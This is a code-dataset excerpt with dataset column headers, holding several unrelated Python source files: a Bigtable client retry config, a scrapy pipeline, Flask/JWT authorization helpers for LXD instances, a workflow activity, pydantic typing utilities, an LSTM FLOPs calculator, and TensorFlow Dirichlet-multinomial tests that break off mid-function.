ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 1a3f59a06023580cd1bde994bfa030ba983f7c85 | config = {
"interfaces": {
"google.bigtable.admin.v2.BigtableTableAdmin": {
"retry_codes": {
"idempotent": ["DEADLINE_EXCEEDED", "UNAVAILABLE"],
"non_idempotent": [],
},
"retry_params": {
"idempotent_params": {
"initial_retry_delay_millis": 1000,
"retry_delay_multiplier": 2.0,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 60000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 60000,
"total_timeout_millis": 600000,
},
"non_idempotent_params": {
"initial_retry_delay_millis": 0,
"retry_delay_multiplier": 1.0,
"max_retry_delay_millis": 0,
"initial_rpc_timeout_millis": 60000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 60000,
"total_timeout_millis": 60000,
},
"non_idempotent_heavy_params": {
"initial_retry_delay_millis": 0,
"retry_delay_multiplier": 1.0,
"max_retry_delay_millis": 0,
"initial_rpc_timeout_millis": 300000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 300000,
"total_timeout_millis": 300000,
},
"drop_row_range_params": {
"initial_retry_delay_millis": 0,
"retry_delay_multiplier": 1.0,
"max_retry_delay_millis": 0,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000,
},
},
"methods": {
"CreateTable": {
"timeout_millis": 130000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "non_idempotent_heavy_params",
},
"CreateTableFromSnapshot": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "non_idempotent_params",
},
"ListTables": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "idempotent_params",
},
"GetTable": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "idempotent_params",
},
"DeleteTable": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "non_idempotent_params",
},
"ModifyColumnFamilies": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "non_idempotent_heavy_params",
},
"DropRowRange": {
"timeout_millis": 900000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "drop_row_range_params",
},
"GenerateConsistencyToken": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "idempotent_params",
},
"CheckConsistency": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "idempotent_params",
},
"SnapshotTable": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "non_idempotent_params",
},
"GetSnapshot": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "idempotent_params",
},
"ListSnapshots": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "idempotent_params",
},
"DeleteSnapshot": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "non_idempotent_params",
},
},
}
}
}
|
py | 1a3f5bb7959fd0eac7bd782d6094cdebbbfa491e |
"""contains custom scrapy pipeline."""
class IndexPipeline(object):
"""This class renames _index field."""
def process_item(self, item, spider):
"""implements https://doc.scrapy.org/en/latest/topics/item-pipeline.html#process_item"""
if item.get('_index'):
item['self'] = item.pop('_index')
return item
|
py | 1a3f5bb9dfa3906b20bfaf53b63f5dfc5214dfef | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from functools import wraps
from werkzeug.exceptions import Forbidden
from .models import *
# from flask_jwt_extended.view_decorators import _decode_jwt_from_request
from flask_jwt_extended import verify_jwt_in_request, get_jwt_claims
from lgw import lxd_api_get
def import_user():
"""
Get user identity from json web token
:return: current_identity
"""
try:
from flask_jwt_extended import get_jwt_identity
current_identity = User.query.get(int(get_jwt_identity()))
return current_identity
except ImportError:
raise ImportError(
'User argument not passed')
def populate_instances_table():
"""
Search for new or deleted instances and update their status in local database
"""
database_lxdservers_list = Server.query.all()
for lxdserver in database_lxdservers_list:
all = []
try:
res = lxd_api_get(lxdserver, 'instances')
for c in res.json()['metadata']:
all.append(c[15:]) # get instance name from api url
except Exception as e:
print(e)
current_instances_list = tuple(all)
database_instances_list = Instance.query.filter_by(location=lxdserver.name)
database_instances_list_names = [str(i.name) for i in database_instances_list]
# Removing old instances from database
for inst in database_instances_list:
if not inst.name in current_instances_list:
db.session.delete(inst)
db.session.commit()
if len(inst.servers) == 0:
db.session.delete(inst)
db.session.commit()
# Adding new instances to database
for cinst in current_instances_list:
if not cinst in database_instances_list_names:
instance = Instance()
instance.name = cinst
instance.location = lxdserver.name
db.session.add(instance)
db.session.commit()
lxdserver.instances.append(instance.id)
db.session.commit()
db.session.commit()
def user_has(ability, get_user=import_user):
"""
Takes an ability (a string name of either a role or an ability) and returns the function if the user has that ability
:param ability:
:param get_user:
:return: wrapper:
"""
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
desired_ability = Ability.query.filter_by(
name=ability).first()
user_abilities = []
current_identity = get_user()
for group in current_identity._groups:
user_abilities += group.abilities
if current_identity.admin or desired_ability.id in user_abilities:
return func(*args, **kwargs)
else:
raise Forbidden("You do not have access")
return inner
return wrapper
def otp_confirmed(fn):
"""
If you decorate a vew with this, it will ensure that the requester has a
valid JWT before calling the actual view. This does check if otp is confirmed
:param fn: The view function to decorate
"""
@wraps(fn)
def wrapper(*args, **kwargs):
# jwt_data = _decode_jwt_from_request(request_type='access')
# print(jwt_data)
verify_jwt_in_request()
claims = get_jwt_claims()
if claims['otp_confirmed'] == False:
raise Forbidden("You do not have access")
else:
return fn(*args, **kwargs)
return wrapper
|
py | 1a3f5cf9398dd57b057b3a2baac9edccc09abdf9 | from S3utility.s3_notification_info import S3NotificationInfo
from provider.execution_context import get_session
from provider.article_structure import ArticleInfo
import provider.lax_provider
from activity.objects import Activity
lookup_functions = {
"article_next_version": provider.lax_provider.article_next_version,
"article_highest_version": provider.lax_provider.article_highest_version,
}
class activity_VersionLookup(Activity):
def __init__(self, settings, logger, conn=None, token=None, activity_task=None):
super(activity_VersionLookup, self).__init__(
settings, logger, conn, token, activity_task
)
self.name = "VersionLookup"
self.pretty_name = "Version Lookup"
self.version = "1"
self.default_task_heartbeat_timeout = 30
self.default_task_schedule_to_close_timeout = 60 * 5
self.default_task_schedule_to_start_timeout = 30
self.default_task_start_to_close_timeout = 60 * 5
self.description = (
"Looks up version on Lax endpoints and stores version in session"
)
self.logger = logger
def do_activity(self, data=None):
try:
info = S3NotificationInfo.from_dict(data)
filename = info.file_name[info.file_name.rfind("/") + 1 :]
run = data["run"]
session = get_session(self.settings, data, run)
session.store_value("filename_last_element", filename)
session.store_value("run_type", data.get("run_type"))
article_structure = ArticleInfo(filename)
if article_structure.article_id is None:
self.logger.error(
"Name '%s' did not match expected pattern for article id" % filename
)
raise RuntimeError(
"article_structure.article_id is None. File pattern problem."
)
version = self.get_version(
self.settings, article_structure, data["version_lookup_function"]
)
session.store_value("version", version)
article_id = str(int(article_structure.article_id))
session.store_value("article_id", article_id)
self.emit_monitor_event(
self.settings,
article_id,
version,
data["run"],
self.pretty_name,
"start",
" ".join(
("Version Lookup for article", article_id, "version:", version)
),
)
self.set_monitor_property(
self.settings, article_id, "article-id", article_id, "text"
)
self.set_monitor_property(
self.settings,
article_id,
"publication-status",
"publication in progress",
"text",
version=version,
)
self.emit_monitor_event(
self.settings,
article_structure.article_id,
version,
data["run"],
self.pretty_name,
"end",
" ".join(
(
"Finished Version Lookup for article",
article_structure.article_id,
"version:",
version,
)
),
)
return self.ACTIVITY_SUCCESS
except Exception as exception:
self.logger.exception(
"Exception when trying to Lookup Version. Error: " + str(exception)
)
return self.ACTIVITY_PERMANENT_FAILURE
def get_version(self, settings, article_structure, lookup_function):
try:
version = article_structure.get_version_from_zip_filename()
if version is None:
return str(
execute_function(
lookup_functions[lookup_function],
article_structure.article_id,
settings,
)
)
return version
except Exception:
self.logger.exception("Exception on function `get_version`")
raise
def execute_function(the_function, arg1, arg2):
return the_function(arg1, arg2)
|
py | 1a3f5e2b8f8af810eb58d382a73ae154256ac03f | """
Custom typing extension.
Classes:
ConstantHolder: Base class for storing constants and avoiding to hardcode everything.
SaveableBaseModel: Child class of pydantic.BaseModel which enables saving and loading that BaseModel.
TypedNamedTuple: Child class of SaveableBaseModel, can be used similarly to a NamedTuple and has some
tensor handling utilities.
ConfigClass: Base class for storing configuration fields that appear in the configuration YAML files.
"""
from __future__ import annotations
import inspect
import json
from collections import Iterable, Mapping
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple, Union, cast
import numpy as np
import torch as th
from pydantic import BaseModel
INF = 32752 # infinity expressed in float16, this is large enough s.t. exp(-INF) == 0
TENSOR_TYPES = (th.Tensor, np.ndarray)
class ConfigClass:
"""
Base class for config storage classes. Defines representation for printing.
"""
def __repr__(self) -> str:
"""
Represent class attributes as key, value pairs.
Returns:
String representation of the config.
"""
str_repr = ["", "-" * 10 + " " + type(self).__name__]
for key, value in vars(self).items():
if key in ["config_orig"]:
continue
if isinstance(value, ConfigClass):
# str_repr += ["-" * 10 + " " + key, str(value)]
str_repr += [str(value)]
else:
str_repr += [f" {key} = {value}"]
return "\n".join(str_repr)
# ---------- SaveableBaseModel: Class for modeling and storing states. ----------
class SaveableBaseModel(BaseModel):
"""
Saveable version of pydantic BaseModel class.
"""
def save(self, file: Union[str, Path]) -> None:
"""
Save the model.
Args:
file: Target json file.
"""
try:
json.dump(self.dict(), Path(file).open("wt", encoding="utf8"))
except TypeError as e:
# something in the object is probably not JSON serializable.
print("---------- JSON encoding error! ----------")
for key, val in self.dict().items():
print(f"{key}: {type(val)}")
raise TypeError(f"See console output. JSON save to {file} failed.") from e
def load(self, file: Union[str, Path]) -> SaveableBaseModel:
"""
Load model values from file.
Args:
file: Source json file.
Returns:
Class instance with values set from the file.
"""
for key, val in json.load(Path(file).open("rt", encoding="utf8")).items():
self.__setattr__(key, val)
return self
@classmethod
def create_from_file(cls, file: Union[str, Path]) -> SaveableBaseModel:
"""
Instantiate model from file.
Args:
file: Source json file.
Returns:
Class instance with values set from the file.
"""
return cls(**json.load(Path(file).open("rt", encoding="utf8")))
class Config:
# configure pydantic.BaseModel to fail on assigning wrongly typed values
validate_assignment = True
# ---------- TypedNamedTuple: Class for explicit data modeling. ----------
def _nested_shape_check(field_name: str, tensor_container: Any, shape: [List[Optional[int]]]) -> None:
"""
Check if input tensor matches the given shape. If input is iterable or mapping, recurse into it and check
if all contained tensors match the given shape.
Args:
field_name: Used to give a more verbose error.
tensor_container: Input tensor or container of tensors.
shape: Target shape to check.
Raises:
AssertionError (wrong shape), TypeError (wrong input type)
"""
if isinstance(tensor_container, TENSOR_TYPES):
value_shape = tensor_container.shape
err_msg = f"Shape mismatch, input {value_shape} defined {shape} on field {field_name}"
# check same number of dimensions
assert len(value_shape) == len(shape), err_msg
# check each dimension
for s1, s2 in zip(value_shape, shape):
# either target shape is arbitrary (None) or it matches input shape
assert s2 is None or s1 == s2, err_msg
elif isinstance(tensor_container, Iterable):
for tensor_subcontainer in tensor_container:
_nested_shape_check(field_name, tensor_subcontainer, shape)
elif isinstance(tensor_container, Mapping):
for _, tensor_subcontainer in tensor_container.items():
_nested_shape_check(field_name, tensor_subcontainer, shape)
else:
raise TypeError(f"Tensor shape check on class {type(tensor_container)} not supported, field {field_name}.")
class TypedNamedTuple(BaseModel):
"""
Behaves similar to NamedTuple. Includes type and shape validation.
Notes:
Implementation of pydantic BaseModel that can be instantiated with args instead of kwargs
Define class field _shape_dict to check shapes.
Args:
*args: Values for the model with same order as defined.
Examples:
>>> class ExampleTuple(TypedNamedTuple):
>>> key: str
>>> data: th.Tensor
>>> # shape check: first dimension arbitrary, second must match exactly
>>> _shapes_dict = {"key": (None, 6)}
>>> t = ExampleTuple("key", th.zeros(4, 6))
>>> t.key # access with field attribute
>>> t.dict()["key"] # access like a dict
>>> t.tuple()[0] # access like a tuple
"""
_shapes_dict: Dict[str, List[Optional[int]]] = {}
def __init__(self, *args, **kwargs):
assert len(args) <= len(self.__fields__), (f"Too many ({len(args)}) arguments "
f"for class {self.__class__.__name__}")
if len(args) > 0:
# fill the kwargs dict with (name, value) entries from args
for (field, _model_field), arg in zip(self.__fields__.items(), args):
assert field not in kwargs, f"Duplicate argument '{field}' for class {self.__class__.__name__}."
kwargs[field] = arg
# instantiate the model with that dict
super().__init__(**kwargs)
self.validate_shapes()
def __len__(self) -> int:
"""
Convenience function: length of the tuple
Returns:
Length.
"""
return len(self.__fields__)
def tuple(self) -> Tuple[Any]:
"""
Access the model values as tuple.
Returns:
Model values as tuple.
"""
return tuple(self.dict().values())
def dict(self, **kwargs) -> Dict[str, Any]: # pylint: disable=useless-super-delegation
"""
Overwrite this function for proper type hints.
Returns:
Model fields and values as dict.
"""
return super().dict(**kwargs)
def keys(self) -> List[str]:
"""
Get list of constant keys.
Returns:
Constant keys.
"""
return self.dict().keys()
def items(self) -> List[str]:
"""
Get list of constant keys.
Returns:
Constant keys.
"""
return self.dict().items()
def values(self) -> List[Any]:
"""
Return constant values.
Returns:
Constant values.
"""
return self.dict().values()
def validate_shapes(self):
"""
Use class field _shapes_dict to check if input tensors match the target shapes.
Returns:
"""
# loop all defined shapes
for key, shape in self._shapes_dict.items():
# get the field value with defined name
value = self.dict()[key]
# compare to target shape
_nested_shape_check(key, value, shape)
def to_cuda(self, *, non_blocking: bool = True) -> None:
"""
Convenience function: Move all tensors in the model to cuda.
Args:
non_blocking: Some PyTorch internal parameter, has something to do with pin_memory in dataloader.
Usually shouldn't hurt to keep it at True.
"""
# loop all tensors in the model
for name, value in self.dict().items():
if isinstance(value, th.Tensor):
# update pydantic BaseModel with setattr
setattr(self, name, value.cuda(non_blocking=non_blocking))
class Config:
# allow torch tensors etc.
arbitrary_types_allowed = True
# ---------- ConstantHolder: Container for constants ----------
class _StringRepr(type):
"""
Metaclass for overwriting result of str(Class).
"""
def __str__(cls) -> str:
"""
When calling str(Class), call Class._get_string_repr method.
Returns:
Custom class string representation.
"""
return cls._get_string_repr() # pylint: disable=no-value-for-parameter
def _get_string_repr(cls) -> str:
"""
Override this to return string representation of the class.
Returns:
Class representation as string.
"""
raise NotImplementedError
class ConstantHolder(metaclass=_StringRepr):
"""
Class to hold constants. Attributes must be uppercase. Cannot be instanced.
Notes:
There is some magic happening here:
The properties of this base class (_keys, _values, _dict) will hold all constants including those of inherited
classes. The interface will then dynamically return the correct things given the current cls.__name__.
Examples:
Instantiate the class and set constants as class attributes.
Set allowed_types to single type or list of types for value checks.
>>> class MyConstants(allowed_types=str):
>>> FIELD = "value"
Methods:
keys: Get list of constant keys.
values: Get list of constant values.
items: Get list of constant key/value tuples.
dict: Get dictionary of constant key/value pairs.
get: Get value given key, error if not found.
get_safe: Get value given key, return default if not found.
check_has_key: Returns bool whether or not the key is in the class.
assert_has_key: Raise error if the key is not found.
check_has_value: Returns bool whether or not the value is in the class.
assert_has_value: Raise error if the value is not found.
Notes:
Public interface: Methods keys, values, items, dict, get. Supports __getitem__ syntax (using []).
This class is introduced because enum.Enum has lots of unnecessary restrictions and is clumsy to use.
Public methods resemble those of a dict but return lists, not e.g. instances of dict_keys.
"""
# create the class properties with empty entries for the root parent
_keys: Dict[str, List[str]] = {"ConstantHolder": []}
_values: Dict[str, List[Any]] = {"ConstantHolder": []}
_dict: Dict[str, Dict[str, Any]] = {"ConstantHolder": {}}
# ---------- Public interface ----------
@classmethod
def keys(cls) -> List[str]:
"""
Get list of constant keys.
Returns:
Constant keys.
"""
return cls._keys[cls.__name__]
@classmethod
def values(cls) -> List[Any]:
"""
Return constant values.
Returns:
Constant values.
"""
return cls._values[cls.__name__]
@classmethod
def dict(cls) -> Dict[str, Any]:
"""
Return constant key-value pairs as dict.
Returns:
Constant keys.
"""
return cls._dict[cls.__name__]
@classmethod
def items(cls) -> List[Tuple[str, Any]]:
"""
Return constant key-value pairs as list of tuples like dict items.
Returns:
Constant keys.
"""
return list(zip(cls._keys[cls.__name__], cls._values[cls.__name__]))
@classmethod
def get(cls, key: str) -> Any:
"""
Get constant value given the key. Raise error if not found.
Args:
key: Constant key.
Returns:
Constant value.
"""
if key not in cls.keys():
raise IndexError(f"No key: {key} in {cls}")
return cast(Any, getattr(cls, key))
@classmethod
def get_safe(cls, key: str, default: Optional[Any] = None) -> Optional[Any]:
"""
Get constant value given the key. Return default if not found.
Args:
key: Constant key.
default: Value to return if key is not found, default None.
Returns:
Constant value or default.
"""
if key not in cls.keys():
return default
return cls.get(key)
@classmethod
def check_has_key(cls, key: str) -> bool:
"""
Check if the key is in the class.
Args:
key: Constant key.
Returns:
Whether or not the key is defined in the class.
"""
return key in cls.keys()
@classmethod
def assert_has_key(cls, key: str) -> None:
"""
Throw error if the key is not found in the class.
Args:
key: Constant key.
"""
assert cls.check_has_key(key), f"Key not found: {key} in {cls}"
@classmethod
def check_has_value(cls, value: Any) -> bool:
"""
Check if the value is in the class.
Args:
value: Constant value.
Returns:
Whether or not the key is defined in the class.
"""
return value in cls.values()
@classmethod
def assert_has_value(cls, value: str) -> None:
"""
Throw error if the value is not found in the class.
Args:
value: Constant value.
"""
assert cls.check_has_value(value), f"Value not found: {value} in {cls}"
# ---------- Private setup methods ----------
@classmethod
def _get_string_repr(cls) -> str:
"""
Return class name and content as string for better error messages.
Returns:
String representation.
"""
return f"ConstantHolder {cls.__name__}: {cls.items()}"
@classmethod
def __init_subclass__(cls, allowed_types: Optional[Union[type, List[type], Tuple[type, ...]]] = None) -> None:
"""
Setup properties for the public interface when this class is inherited.
This will be called on nested inheritance as well.
Args:
allowed_types: Optionally specify a type or list of types that are allowed for values.
By default all values are allowed.
"""
cls._keys[cls.__name__] = []
cls._values[cls.__name__] = []
cls._dict[cls.__name__] = {}
# add parent fields
for parent_cls in cls.__bases__:
cls._keys[cls.__name__] += cls._keys[parent_cls.__name__]
cls._values[cls.__name__] += cls._values[parent_cls.__name__]
cls._dict[cls.__name__].update(cls._dict[parent_cls.__name__])
# loop attributes, check correctness and extend the parent's class properties _keys, _values, _dict.
for key in cls.__dict__:
# ignore non-public fields
if key[0] == "_":
continue
# get the value of the constant
value = getattr(cls, key)
# ignore classmethods
if inspect.ismethod(value) and value.__self__ is cls:
continue
# make sure all constants are uppercase
assert key == key.upper(), f"Constant: {key} in class: {cls.__name__} must be uppercase."
# if allowed types is specified, make sure the value types are allowed
if allowed_types is not None:
# isinstance errors when fed lists instead of tuple, so convert lists to tuples
if isinstance(allowed_types, list):
allowed_types = tuple(allowed_types)
assert isinstance(value, allowed_types), (
f"Constant: {key} in class: {cls.__name__} must be of type {allowed_types}")
# update class properties
cls._keys[cls.__name__].append(key)
cls._values[cls.__name__].append(value)
cls._dict[cls.__name__][key] = value
def __init__(self) -> None:
"""
Raise error when trying to instance a ConstantHolder class.
"""
raise RuntimeError(f"Do not instance this class, it's a ConstantHolder: {type(self).__name__}")
|
py | 1a3f5e3c3e6fe43430f4f4ccb0115af9c5349604 | ################################################################################
# [VMLMF] Lowrank Matrix Factorization with Vector-Multiplication
# Project: Starlab
#
# Authors: Hyojin Jeon ([email protected]), Seoul National University
# U Kang ([email protected]), Seoul National University
#
# File: compression_cal.py
# - utilities for analyze compression results of VMLMF
#
# Version : 1.0
# Date : Oct 14, 2021
# Main Contact: Hyojin Jeon
#
# This software is free of charge under research purposes.
# For commercial purposes, please contact the authors.
#
################################################################################
# pylint: disable=C0103, E1101, C0114, R0902,C0116, R0914, R0913, C0123, W0613, W0102,C0413, E0401,R1719
"""
====================================
:mod:`compression_cal`
====================================
.. moduleauthor:: Hyojin Jeon <[email protected]>
설명
=====
모델의 파라미터 수와 FLOPs 수를 계산하기 위한 모듈입니다.
"""
import sys
sys.path.append('../')
def print_model_parm_nums(model):
"""print the number of parameters of the model
:param model: model to count parameters
"""
modelparams=sum(p.numel() for p in model.parameters())
print(f" + Number of params:{(modelparams/1e3):.2f}K")
def print_model_parm_flops(model,seq_len,args,modeltype="vmmodel"):
"""print FLOPs of the model
:param model: model to count FLOPs
:param seq_len: integer sequence length of the input data
:param args: argument user decided
:param modeltype: string type of the model
"""
if modeltype in ['vmlmf_group','vmlmf_lm']:
print("Not Implemented")
return
batch_size=args.batch_size
modeltype=args.model.lower() if modeltype != "mylstm" else "mylstm"
total_ops=count_lstm(model,seq_len,batch_size,modeltype)
total_ops+=count_linear(model,18) #linear의 iN_FEATURES,OUTFEATURE
print(f" + Number of FLOPs: {(total_ops / 1e6):.2f}M")
print(total_ops)
def print_model_parm_names(model):
"""print the name of parameters of the model
:param model: model to get parameters
"""
for idx,m in enumerate(model.modules()):
print( idx, '->', m )
print("Model's state_dict:")
for param_tensor in model.state_dict():
print(param_tensor, "\t", model.state_dict()[param_tensor].size())
def _count_lstm_cell(modeltype,input_size,hidden_size,wRank=None,uRank=None,bias=True):
"""count FLOPs of lstm/vmlmf cell
:param modeltype: string modeltype
:param input_size: integer input size of the model
:param hidden_size: integer hidden layer size of the model
:param wRank: input to hidden matrix rank of vmlmf
:param uRank: hjdden to hidden matrix rank of vmlmf
:param bias: whether the model share bias between for gates
:returns: FLOPs of a cell
"""
total_ops=0
isvmmodel = True if modeltype != "mylstm" else False
#vector-vector multiplication
input_dia_ops = input_size
hidden_dia_ops = hidden_size
#substract vec elem
if wRank is not None:
input_addition = (2*wRank-1)*input_size + hidden_size
if uRank is not None:
hidden_addition = (2*uRank-1)*hidden_size +hidden_size
input_ops=(2*input_size-1)*wRank+(2*wRank-1)*hidden_size \
if isvmmodel else (2*input_size-1)*hidden_size
hidden_ops=(2*hidden_size-1)*uRank+(2*uRank-1)*hidden_size\
if isvmmodel else (2*hidden_size-1)*hidden_size
state_ops=input_ops+hidden_ops + input_dia_ops + hidden_dia_ops +hidden_size*3 \
+input_addition + hidden_addition if isvmmodel else input_ops + hidden_ops + hidden_size
if bias:
state_ops+=hidden_size
total_ops+=state_ops*4
#hadamard addition (f*c + i*g )
total_ops+=hidden_size*3
#h'=o*tanh(c')
total_ops+=hidden_size
return total_ops
def count_lstm(model,seq_len,batch_size,modeltype):
"""count FLOPs of lstm/vmlmf layer
:param model: model object
:param seq_len: integer sequence length of the input data
:param batch_size: integer batch_size of the input data
:param modeltype: type of the model
:returns: FLOPs of LSTM model
"""
if modeltype in ['vmlmf_group','vmlmf_lm']:
print("Not Implemented")
return None
total_ops=0
total_ops+=_count_lstm_cell(modeltype,model.rnn.input_size,\
model.rnn.hidden_layer_sizes[0],model.rnn.w_rank,model.rnn.u_ranks,bias=True)
for i in range(len(model.rnn.hidden_layer_sizes)-1):
total_ops+=_count_lstm_cell(modeltype,model.rnn.hidden_layer_sizes[i],\
model.rnn.hidden_layer_sizes[i+1],model.rnn.w_rank,model.rnn.u_ranks,bias=True)
total_ops*=seq_len
total_ops*=batch_size
return total_ops
def count_linear(model,output_size):
"""count FLOPs of linear layer
:param model: model object
:param output_size: integer output size of the model
:returns: FLOPs of linear layer
"""
input_size=model.rnn.hidden_layer_sizes[-1]
return input_size*output_size*2
|
py | 1a3f5eaf66c302895efb651ebec57410469f701c | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class DirichletMultinomialTest(tf.test.TestCase):
def testSimpleShapes(self):
with self.test_session():
alpha = np.random.rand(3)
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
self.assertEqual(3, dist.event_shape().eval())
self.assertAllEqual([], dist.batch_shape().eval())
self.assertEqual(tf.TensorShape([3]), dist.get_event_shape())
self.assertEqual(tf.TensorShape([]), dist.get_batch_shape())
def testComplexShapes(self):
with self.test_session():
alpha = np.random.rand(3, 2, 2)
n = [[3., 2], [4, 5], [6, 7]]
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
self.assertEqual(2, dist.event_shape().eval())
self.assertAllEqual([3, 2], dist.batch_shape().eval())
self.assertEqual(tf.TensorShape([2]), dist.get_event_shape())
self.assertEqual(tf.TensorShape([3, 2]), dist.get_batch_shape())
def testNproperty(self):
alpha = [[1., 2, 3]]
n = [[5.]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
self.assertEqual([1, 1], dist.n.get_shape())
self.assertAllClose(n, dist.n.eval())
def testAlphaProperty(self):
alpha = [[1., 2, 3]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(1, alpha)
self.assertEqual([1, 3], dist.alpha.get_shape())
self.assertAllClose(alpha, dist.alpha.eval())
def testPmfNandCountsAgree(self):
alpha = [[1., 2, 3]]
n = [[5.]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
dist.pmf([2., 3, 0]).eval()
dist.pmf([3., 0, 2]).eval()
with self.assertRaisesOpError('Condition x >= 0.*'):
dist.pmf([-1., 4, 2]).eval()
with self.assertRaisesOpError('Condition x == y.*'):
dist.pmf([3., 3, 0]).eval()
def testPmf_non_integer_counts(self):
alpha = [[1., 2, 3]]
n = [[5.]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
dist.pmf([2., 3, 0]).eval()
dist.pmf([3., 0, 2]).eval()
dist.pmf([3.0, 0, 2.0]).eval()
# Both equality and integer checking fail.
with self.assertRaisesOpError('Condition x == y.*'):
dist.pmf([1.0, 2.5, 1.5]).eval()
dist = tf.contrib.distributions.DirichletMultinomial(
n, alpha, validate_args=False)
dist.pmf([1., 2., 3.]).eval()
# Non-integer arguments work.
dist.pmf([1.0, 2.5, 1.5]).eval()
def testPmfBothZeroBatches(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
# Both zero-batches. No broadcast
alpha = [1., 2]
counts = [1., 0]
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(1 / 3., pmf.eval())
self.assertEqual((), pmf.get_shape())
def testPmfBothZeroBatchesNontrivialN(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
# Both zero-batches. No broadcast
alpha = [1., 2]
counts = [3., 2]
dist = tf.contrib.distributions.DirichletMultinomial(5., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(1 / 7., pmf.eval())
self.assertEqual((), pmf.get_shape())
def testPmfBothZeroBatchesMultidimensionalN(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [1., 2]
counts = [3., 2]
n = np.full([4, 3], 5., dtype=np.float32)
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
pmf = dist.pmf(counts)
self.assertAllClose([[1 / 7., 1 / 7., 1 / 7.]] * 4, pmf.eval())
self.assertEqual((4, 3), pmf.get_shape())
def testPmfAlphaStretchedInBroadcastWhenSameRank(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [[1., 2]]
counts = [[1., 0], [0., 1]]
dist = tf.contrib.distributions.DirichletMultinomial([1.], alpha)
pmf = dist.pmf(counts)
self.assertAllClose([1 / 3., 2 / 3.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfAlphaStretchedInBroadcastWhenLowerRank(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [1., 2]
counts = [[1., 0], [0., 1]]
pmf = tf.contrib.distributions.DirichletMultinomial(1., alpha).pmf(counts)
self.assertAllClose([1 / 3., 2 / 3.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfCountsStretchedInBroadcastWhenSameRank(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [[1., 2], [2., 3]]
counts = [[1., 0]]
pmf = tf.contrib.distributions.DirichletMultinomial(
[1., 1.], alpha).pmf(counts)
self.assertAllClose([1 / 3., 2 / 5.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfCountsStretchedInBroadcastWhenLowerRank(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [[1., 2], [2., 3]]
counts = [1., 0]
pmf = tf.contrib.distributions.DirichletMultinomial(1., alpha).pmf(counts)
self.assertAllClose([1 / 3., 2 / 5.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfForOneVoteIsTheMeanWithOneRecordInput(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
alpha = [1., 2, 3]
with self.test_session():
for class_num in range(3):
counts = np.zeros((3), dtype=np.float32)
counts[class_num] = 1
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
mean = dist.mean().eval()
pmf = dist.pmf(counts).eval()
self.assertAllClose(mean[class_num], pmf)
self.assertTupleEqual((3,), mean.shape)
self.assertTupleEqual((), pmf.shape)
def testMeanDoubleTwoVotes(self):
# The probabilities of two votes falling into class k for
# DirichletMultinomial(2, alpha) is twice as much as the probability of one
# vote falling into class k for DirichletMultinomial(1, alpha)
alpha = [1., 2, 3]
with self.test_session():
for class_num in range(3):
counts_one = np.zeros((3), dtype=np.float32)
counts_one[class_num] = 1.
counts_two = np.zeros((3), dtype=np.float32)
counts_two[class_num] = 2
dist1 = tf.contrib.distributions.DirichletMultinomial(1., alpha)
dist2 = tf.contrib.distributions.DirichletMultinomial(2., alpha)
mean1 = dist1.mean().eval()
